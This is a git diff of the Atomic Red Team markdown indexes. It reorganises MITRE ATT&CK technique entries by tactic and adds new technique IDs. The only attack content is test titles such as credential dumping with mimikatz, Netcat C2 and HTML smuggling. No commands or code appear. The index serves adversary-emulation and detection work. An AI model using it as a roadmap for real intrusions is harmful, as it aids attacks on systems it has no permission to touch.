+- T1069.001 Permission Groups Discovery: Local Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1201 Password Policy Discovery](../../T1201/T1201.md)
+  - Atomic Test #12: Examine AWS Password Policy [iaas:aws]
+- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1012 Query Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1018 Remote System Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1124 System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # impact
+- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
   - Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# discovery
-- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
-  - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws]
-  - Atomic Test #2: AWS - EC2 Security Group Enumeration [iaas:aws]
-- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
-  - Atomic Test #1: AWS S3 Enumeration [iaas:aws]
-- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1201 Password Policy Discovery](../../T1201/T1201.md)
-  - Atomic Test #12: Examine AWS Password Policy [iaas:aws]
-- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
-  - Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
-- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# persistence
-- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
-  - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
-- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
-  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
-- [T1098 Account Manipulation](../../T1098/T1098.md)
-  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
-  - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
-  - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
-  - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
-  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
-  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
-  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
-- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# privilege-escalation
-- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1548.005 Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
-  - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
-- [T1098 Account Manipulation](../../T1098/T1098.md)
-  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
-  - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
-  - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
-  - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
-  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
-  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
-  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
-
-# collection
-- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
-  - Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
-  - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
-  - Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1529 System Shutdown/Reboot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # initial-access
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
-  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
-  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
-  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
-
-# lateral-movement
-- T1021.008 Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# execution
-- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.003 User Execution: Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # exfiltration
-- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.004 Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 6a22d25fc7..4f9de40df4 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -48,6 +48,7 @@
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1006 Direct Volume Access](../../T1006/T1006.md)
   - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
+- T1666 Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.008 Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md)
   - Atomic Test #1: New-Inbox Rule to Hide E-mail in M365 [azure-ad]
 - T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -278,6 +279,7 @@
   - Atomic Test #10: Event Log Manipulations- Time slipping via Powershell [windows]
 - [T1620 Reflective Code Loading](../../T1620/T1620.md)
   - Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
   - Atomic Test #1: Delay execution with ping [linux, macos]
@@ -665,6 +667,7 @@
   - Atomic Test #1: Register Portable Virtualbox [windows]
   - Atomic Test #2: Create and start VirtualBox virtual machine [windows]
   - Atomic Test #3: Create and start Hyper-V virtual machine [windows]
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
   - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -734,11 +737,14 @@
   - Atomic Test #1: Hidden Window [windows]
   - Atomic Test #2: Headless Browser Accessing Mockbin [windows]
   - Atomic Test #3: Hidden Window-Conhost Execution [windows]
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
   - Atomic Test #1: HTML Smuggling Remote Payload [windows]
@@ -948,6 +954,7 @@
 - T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.006 Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
   - Atomic Test #1: Thread Execution Hijacking [windows]
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
@@ -1223,6 +1230,7 @@
 - [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
+- T1546.017 Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
   - Atomic Test #1: Netsh Helper DLL Registration [windows]
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1378,6 +1386,7 @@
   - Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
   - Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
   - Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1204.003 User Execution: Malicious Image](../../T1204.003/T1204.003.md)
   - Atomic Test #1: Malicious Execution from Mounted ISO Image [windows]
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1506,6 +1515,7 @@
   - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
   - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
   - Atomic Test #1: Application Shim Installation [windows]
   - Atomic Test #2: New shim database files created in the default shim database directory [windows]
@@ -1756,6 +1766,7 @@
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.017 Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
   - Atomic Test #1: Netsh Helper DLL Registration [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1792,6 +1803,7 @@
   - Atomic Test #2: DNS Regular Beaconing [windows]
   - Atomic Test #3: DNS Long Domain Query [windows]
   - Atomic Test #4: DNS C2 [windows]
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1071 Application Layer Protocol](../../T1071/T1071.md)
@@ -1846,7 +1858,7 @@
   - Atomic Test #1: ICMP C2 [windows]
   - Atomic Test #2: Netcat C2 [windows]
   - Atomic Test #3: Powercat C2 [windows]
-- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1978,6 +1990,7 @@
   - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
   - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
   - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
+- T1557.004 Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1560 Archive Collected Data](../../T1560/T1560.md)
   - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
@@ -2002,12 +2015,14 @@
 - [T1114.002 Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md)
   - Atomic Test #1: Office365 - Remote Mail Collected [office-365]
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.004 Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1213.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
   - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
+- T1213.005 Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # lateral-movement
 - [T1021.005 Remote Services:VNC](../../T1021.005/T1021.005.md)
@@ -2150,6 +2165,7 @@
 - [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
   - Atomic Test #1: Install and Register Password Filter DLL [windows]
   - Atomic Test #2: Install Additional Authentication Packages [windows]
